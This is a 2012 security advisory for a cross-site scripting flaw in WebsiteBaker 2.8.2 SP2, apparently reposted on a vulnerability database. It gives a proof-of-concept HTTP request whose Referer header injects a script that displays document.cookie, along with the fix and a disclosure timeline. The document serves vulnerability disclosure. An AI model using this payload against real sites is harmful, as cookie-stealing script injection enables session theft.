WebsiteBaker 2.8.2 Cross Site Scripting

2012.02.21
Credit: Stefan Schurtz
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Advisory: WebsiteBaker 2.8.2 SP2 HTTP-Referer XSS vulnerability Advisory ID: SSCHADV2012-003 Author: Stefan Schurtz Affected Software: Successfully tested on WebsiteBaker 2.8.2 SP2 Vendor URL: www.websitebaker2.org Vendor Status: fixed ========================== Vulnerability Description ========================== HTTP-Referer in WebsiteBaker 2.8.2 SP2 is prone to a XSS vulnerability ================== PoC-Exploit ================== http://[target]/wb/search/index.php http://[target]/wb/account/forgot.php Host: [target] User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Connection: keep-alive Referer: '"/><script>alert(document.cookie)</script> ========= Solution ========= Upgrade to WebsiteBaker 2.8.3 ==================== Disclosure Timeline ==================== 31-Jan-2012 - vendor informed 31-Jan-2012 - release date of this security advisory 13-Feb-2012 - fixed by vendor ======== Credits ======== Vulnerability found and advisory written by Stefan Schurtz. =========== References =========== http://www.darksecurity.de/advisories/2012/SSCHADV2012-003.txt

References:

http://www.websitebaker2.org/
http://www.darksecurity.de/advisories/2012/SSCHADV2012-003.txt


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top